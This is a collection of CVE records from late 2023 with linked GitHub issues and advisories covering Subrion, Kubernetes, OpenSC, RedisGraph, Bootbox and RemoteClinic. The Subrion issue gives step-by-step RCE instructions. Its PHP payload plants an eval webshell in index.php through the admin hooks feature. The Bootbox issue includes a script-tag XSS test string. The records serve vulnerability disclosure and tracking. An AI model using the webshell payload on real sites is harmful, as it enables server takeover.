{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/intelliants/subrion/issues/909" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/intelliants/subrion/issues/909" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:intelliants:subrion:4.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "E9C1813C-DBF7-4ADF-8FC0-23608A417D29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/intelliants/subrion/issues/909
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "intelliants", "subrion" ]
## There is a remote command execution vulnerability ### Affected version - subrion 4.2.1 lates ### login address ~~~ text http://127.0.0.1/panel ~~~ Find `PHP info` in the `System` module ![image-20231026102809757](https://github.com/intelliants/subrion/assets/56108892/3457da55-dd71-4d22-bd97-048b9ef4ae3b) Get the absolute path to the website in phpinfo information ~~~ text _SERVER["DOCUMENT_ROOT"] ~~~ ### Attack 1. Select the `Hooks` field in the `System` module ![image-20231026103342460](https://github.com/intelliants/subrion/assets/56108892/98b84e8d-611c-4277-92bd-11ddddf8ef11) 2. Edit `sitemapGeneration` in `Hooks` and save Get absolute path from `PHPinfo` above `_SERVER["DOCUMENT_ROOT"]=F:/phpStudy/PHPTutorial/WWW/subrion_cms_4.2.1/` At this point we can write webshell into the website’s homepage file index.php payload ~~~ text fputs(fopen('F:/phpStudy/PHPTutorial/WWW/subrion_cms_4.2.1/index.php','a+'),'@eval($_GET[cmd]);'); ~~~ ![image-20231026104421861](https://github.com/intelliants/subrion/assets/56108892/7acd6a0c-fb72-4838-8cb4-6643d24e774d) 3. At this point, we can click the `Generate Sitemap` function to trigger code execution ![2023-10-26 104533](https://github.com/intelliants/subrion/assets/56108892/06299b51-45dc-45d0-9f2f-46f815914f7f) ![image-20231026104834336](https://github.com/intelliants/subrion/assets/56108892/d7972cc6-8604-4288-aec6-f86ed5263d8e) The site generation function is to first write a file, and then perform a syntax check on the written PHP code. If the check passes, the code execution will be triggered. ![image-20231026111134512](https://github.com/intelliants/subrion/assets/56108892/21146d00-fdf1-4e22-a0cf-ffec8b08855f) ~~~ php eval($hook['code']); ~~~ 4. We are accessing the website homepage file index.php ![2023-10-26 105111](https://github.com/intelliants/subrion/assets/56108892/d9837caf-f929-43d5-9cba-4e9669f7e6d3) ### Proposed changes Filter dangerous functions and content in the content before writing the file
There is a RCE vulnerability
https://api.github.com/repos/intelliants/subrion/issues/909/comments
1
2023-10-26T04:59:32Z
2024-12-03T05:23:41Z
https://github.com/intelliants/subrion/issues/909
1,962,706,841
909
5,724
CVE-2023-3893
2023-11-03T18:15:08.623
A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes running kubernetes-csi-proxy may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes running kubernetes-csi-proxy.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/119594" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/lWksE2BoCyQ" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20231221-0004/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/119594" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/lWksE2BoCyQ" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20231221-0004/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:csi_proxy:*:*:*:*:*:*:*:*", "matchCriteriaId": "1A1845E5-AD91-4083-8836-4C0E4547C5A4", "versionEndExcluding": null, "versionEndIncluding": "1.1.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:csi_proxy:2.0.0:alpha0:*:*:*:*:*:*", "matchCriteriaId": "2DE6A409-1AFC-4F71-B2C5-617DF484C393", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/kubernetes/kubernetes/issues/119594
[ "Issue Tracking", "Vendor Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.1/av:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) - **HIGH** (8.8) A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes running kubernetes-csi-proxy may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes running kubernetes-csi-proxy. ### Am I vulnerable? Any kubernetes environment with Windows nodes that are running kubernetes-csi-proxy is impacted. This is a common default configuration on Windows nodes. Run `kubectl get nodes -l kubernetes.io/os=windows` to see if any Windows nodes are in use. #### Affected Versions - kubernetes-csi-proxy <= v2.0.0-alpha.0 - kubernetes-csi-proxy <= v1.1.2 ### How do I mitigate this vulnerability? The provided patch fully mitigates the vulnerability and has no known side effects. Full mitigation for this class of issues requires patches applied for CVE-2023-3676, CVE-2023-3955, and CVE-2023-3893. Outside of applying the provided patch, there are no known mitigations to this vulnerability. #### Fixed Versions - kubernetes-csi-proxy master - fixed by https://github.com/kubernetes-csi/csi-proxy/pull/306 - kubernetes-csi-proxy v2.0.0-alpha.1 - fixed by https://github.com/kubernetes-csi/csi-proxy/pull/307 - kubernetes-csi-proxy v1.1.3 - fixed by https://github.com/kubernetes-csi/csi-proxy/pull/306 To upgrade: cordon the node, stop the associated Windows service, replace the csi-proxy.exe binary, restart the associated Windows service, and un-cordon the node. See the installation docs for more details: https://github.com/kubernetes-csi/csi-proxy#installation If a Windows host process daemon set is used to run kubernetes-csi-proxy such as https://github.com/kubernetes-csi/csi-driver-smb/blob/master/charts/latest/csi-driver-smb/templates/csi-proxy-windows.yaml, simply upgrade the image to a fixed version such as ghcr.io/kubernetes-sigs/sig-windows/csi-proxy:v1.1.3 ### Detection Kubernetes audit logs can be used to detect if this vulnerability is being exploited. Pod create events with embedded powershell commands are a strong indication of exploitation. If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was discovered by James Sturtevant @jsturtevant and Mark Rossetti @marosset during the process of fixing CVE-2023-3676 (that original CVE was reported by Tomer Peled @tomerpeled92) The issue was fixed and coordinated by the fix team: James Sturtevant @jsturtevant Mark Rossetti @marosset Andy Zhang @andyzhangx Justin Terry @jterry75 Kulwant Singh @KlwntSingh Micah Hausler @micahhausler Rita Zhang @ritazh and release managers: Mauricio Poppe @mauriciopoppe
CVE-2023-3893: Insufficient input sanitization on kubernetes-csi-proxy leads to privilege escalation
https://api.github.com/repos/kubernetes/kubernetes/issues/119594/comments
5
2023-07-26T15:30:26Z
2023-11-04T16:10:06Z
https://github.com/kubernetes/kubernetes/issues/119594
1,822,676,744
119,594
5,725
CVE-2022-3172
2023-11-03T20:15:08.550
A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This could lead to the client performing unexpected actions as well as forwarding the client's API server credentials to third parties.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 3.7, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 4.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/112513" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/_aLzYMpPRak" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20231221-0005/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/112513" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/_aLzYMpPRak" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20231221-0005/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:apiserver:*:*:*:*:*:*:*:*", "matchCriteriaId": "D740494E-6332-4421-BE43-C0CEB179CBA6", "versionEndExcluding": null, "versionEndIncluding": "1.21.14", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:apiserver:*:*:*:*:*:*:*:*", "matchCriteriaId": "57CC215D-A8DA-4D7F-8FF6-A1FC8451DEDD", "versionEndExcluding": "1.22.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.22.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:apiserver:*:*:*:*:*:*:*:*", "matchCriteriaId": "1E67C91E-260F-4C6B-BEE1-44B9C7F29C35", "versionEndExcluding": "1.23.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.23.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:apiserver:*:*:*:*:*:*:*:*", "matchCriteriaId": "9D2847AF-B9A8-40FF-AED5-0BBAEF012BA9", "versionEndExcluding": "1.24.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.24.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:apiserver:1.25.0:*:*:*:*:*:*:*", "matchCriteriaId": "A049EC76-7250-484F-99AE-BBF05EA04225", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/kubernetes/kubernetes/issues/112513
[ "Issue Tracking", "Vendor Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L) (5.1, medium) A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This could lead to the client performing unexpected actions as well as forwarding the client's API server credentials to third parties. This issue has been rated medium and assigned CVE-2022-3172 ### Am I vulnerable? All Kubernetes clusters with the following versions that are running aggregated API servers are impacted. To identify if you have aggregated API servers configured, run the following command: ```shell kubectl get apiservices.apiregistration.k8s.io -o=jsonpath='{range .items[?(@.spec.service)]}{.metadata.name}{"\n"}{end}' ``` #### Affected Versions - kube-apiserver v1.25.0 - kube-apiserver v1.24.0 - v1.24.4 - kube-apiserver v1.23.0 - v1.23.10 - kube-apiserver v1.22.0 - v1.22.13 - kube-apiserver <= v1.21.14 ### How do I mitigate this vulnerability? Aside from upgrading, no direct mitigation is available. Aggregated API servers are a trusted part of the Kubernetes control plane, and configuring them is a privileged administrative operation. Ensure that only trusted cluster administrators are allowed to create or modify `APIService` configuration, and follow security best practices with any aggregated API servers that may be in use. #### Fixed Versions - kube-apiserver v1.25.1 - fixed by #112330 - kube-apiserver v1.24.5 - fixed by #112331 - kube-apiserver v1.23.11 - fixed by #112358 - kube-apiserver v1.22.14 - fixed by #112359 **Fix impact:** The fix blocks all 3XX responses from aggregated API servers by default. This may disrupt an aggregated API server that relies on redirects as part of its normal function. If all current and future aggregated API servers are considered trustworthy and redirect functionality is required, set the `--aggregator-reject-forwarding-redirect` Kubernetes API server flag to `false` to restore the previous behavior. To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade ### Detection Kubernetes audit log events indicate the HTTP status code sent to the client via the `responseStatus.code` field. This can be used to detect if an aggregated API server is redirecting clients. If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was reported by Nicolas Joly & Weinong Wang @weinong from Microsoft. The issue was fixed and coordinated by Di Jin @jindijamie @enj @liggitt @lavalamp @deads2k and @puerco. /area security /kind bug /committee security-response /label official-cve-feed /sig api-machinery /area apiserver /triage accepted
CVE-2022-3172: Aggregated API server can cause clients to be redirected (SSRF)
https://api.github.com/repos/kubernetes/kubernetes/issues/112513/comments
4
2022-09-16T13:14:50Z
2022-11-10T03:57:00Z
https://github.com/kubernetes/kubernetes/issues/112513
1,375,935,782
112,513
5,726
CVE-2023-40660
2023-11-06T17:15:11.757
A flaw was found in OpenSC packages that allow a potential PIN bypass. When a token/card is authenticated by one process, it can perform cryptographic operations in other processes when an empty zero-length pin is passed. This issue poses a security risk, particularly for OS logon/screen unlock and for small, permanently connected tokens to computers. Additionally, the token can internally track login status. This flaw allows an attacker to gain unauthorized access, carry out malicious actions, or compromise the system without the user's awareness.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.7, "impactScore": 5.9, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.7, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2023:7876" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2023:7879" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2023-40660" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2240912" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/OpenSC/OpenSC/issues/2792#issuecomment-1674806651" }, { "source": "secalert@redhat.com", "tags": [ "Release Notes" ], "url": "https://github.com/OpenSC/OpenSC/releases/tag/0.24.0-rc1" }, { "source": "secalert@redhat.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/OpenSC/OpenSC/wiki/OpenSC-security-advisories" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://www.openwall.com/lists/oss-security/2023/12/13/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2023:7876" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2023:7879" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2023-40660" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2240912" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/OpenSC/OpenSC/issues/2792#issuecomment-1674806651" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://github.com/OpenSC/OpenSC/releases/tag/0.24.0-rc1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/OpenSC/OpenSC/wiki/OpenSC-security-advisories" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00024.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3CPQOMCDWFRBMEFR5VK4N5MMXXU42ODE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GLYEFIBBA37TK3UNMZN5NOJ7IWCIXLQP/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensc_project:opensc:*:*:*:*:*:*:*:*", "matchCriteriaId": "E6722AEB-DDA9-49E4-9D5C-FBE1F15230AF", "versionEndExcluding": null, "versionEndIncluding": "0.23.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/OpenSC/OpenSC/issues/2792#issuecomment-1674806651
[ "Issue Tracking" ]
github.com
[ "OpenSC", "OpenSC" ]
https://github.com/OpenSC/OpenSC/compare/0.23.0...master shows +250 commits since last release. Amongst those commits are some critical fixes. Do you have any plans to release new version soon? 🤔
New release 0.24.0
https://api.github.com/repos/OpenSC/OpenSC/issues/2792/comments
26
2023-06-02T11:38:07Z
2023-12-13T11:29:55Z
https://github.com/OpenSC/OpenSC/issues/2792
1,738,037,344
2,792
5,727
CVE-2023-47004
2023-11-06T22:15:08.043
Buffer Overflow vulnerability in Redis RedisGraph v.2.x through v.2.12.8 and fixed in v.2.12.9 allows an attacker to execute arbitrary code via the code logic after valid authentication.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/RedisGraph/RedisGraph/issues/3178" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/RedisGraph/RedisGraph/issues/3178" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redislabs:redisgraph:*:*:*:*:*:*:*:*", "matchCriteriaId": "AF83E4D7-A176-4767-A2C4-31B52259CBAB", "versionEndExcluding": "2.12.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/RedisGraph/RedisGraph/issues/3178
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "RedisGraph", "RedisGraph" ]
# Summary I have found a security vulnerability in the latest codebase of RedisGraph. With personal investigation, I think an attacker could leverage this vulnerability to archive a **remote code execution** on a vulnerable Redis instance. The vulnerability exists in code logic after a valid authentication. # PoC Here is a screenshot for a local lab environment to demostrate remote code execution ![73FA3C08-BA4F-46DC-BBA2-36A2240253A1](https://github.com/RedisGraph/RedisGraph/assets/11502905/073065bd-9695-40be-9701-c0ec45aef7b8) > we have a full screen record for the whole process but it is too big to attach to a github issue # Step To Reproduce Since this vulnerability leads to a remote code execution attack vector, it is better not to put the PoC in a public visitable GitHub issue. Please let me know a perfer way to report this vulnerability to the dev team.
OOB-write vulnerability lead to REMOTE CODE EXECUTION
https://api.github.com/repos/RedisGraph/RedisGraph/issues/3178/comments
4
2023-09-07T03:11:33Z
2023-11-07T13:09:02Z
https://github.com/RedisGraph/RedisGraph/issues/3178
1,885,041,045
3,178
5,728
CVE-2023-46998
2023-11-07T05:15:13.657
Cross Site Scripting vulnerability in BootBox Bootbox.js v.3.2 through 6.0 allows a remote attacker to execute arbitrary code via a crafted payload to alert(), confirm(), prompt() functions.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/bootboxjs/bootbox/issues/661" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/soy-oreocato/CVE-2023-46998/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/bootboxjs/bootbox/issues/661" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/soy-oreocato/CVE-2023-46998/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bootboxjs:bootbox:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "78B59235-F11D-45F3-BC6F-15B49C64CCC1", "versionEndExcluding": null, "versionEndIncluding": "6.0.0", "versionStartExcluding": null, "versionStartIncluding": "3.2.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/bootboxjs/bootbox/issues/661
[ "Issue Tracking" ]
github.com
[ "bootboxjs", "bootbox" ]
bootbox.confirm and alert use jquery's .html() (and other functions) that add content to html elements. These are a potential XSS security issue since jquery evaluates the content. Here's a working example (scroll down to the bottom of the JS window for the example code, I just borrowed somebody's fiddle and modified) https://jsfiddle.net/93sk1zeh/2/ Pass in the following string to the text input field <script>alert('HELLO WORLD')</script> it should show 3 separate alert boxes (which verifies it can potentially be used for XSS attacks). I think there's two options: 1) Sanitize input before adding it to a DOM element using jquery, or build up the element in a safe manner (i'm not 100% sure the right way to do that just yet tbh) 2) Mention in the documentation the potential danger of passing in user-submitted data as the first parameter to bootbox.confirm() and bootbox.alert(), or, if using an object instead of a string message, as the title property. This way it's clear the library user is responsible for sanitizing any input that might be used with bootbox.
Document or fix possible XSS vulnerability (via jquery)
https://api.github.com/repos/bootboxjs/bootbox/issues/661/comments
48
2018-05-24T01:16:44Z
2025-03-28T02:13:21Z
https://github.com/bootboxjs/bootbox/issues/661
325,930,215
661
5,729
CVE-2023-33478
2023-11-07T15:15:10.630
RemoteClinic 2.0 has a SQL injection vulnerability in the ID parameter of /medicines/stocks.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/22" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/remoteclinic/RemoteClinic/issues/22
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
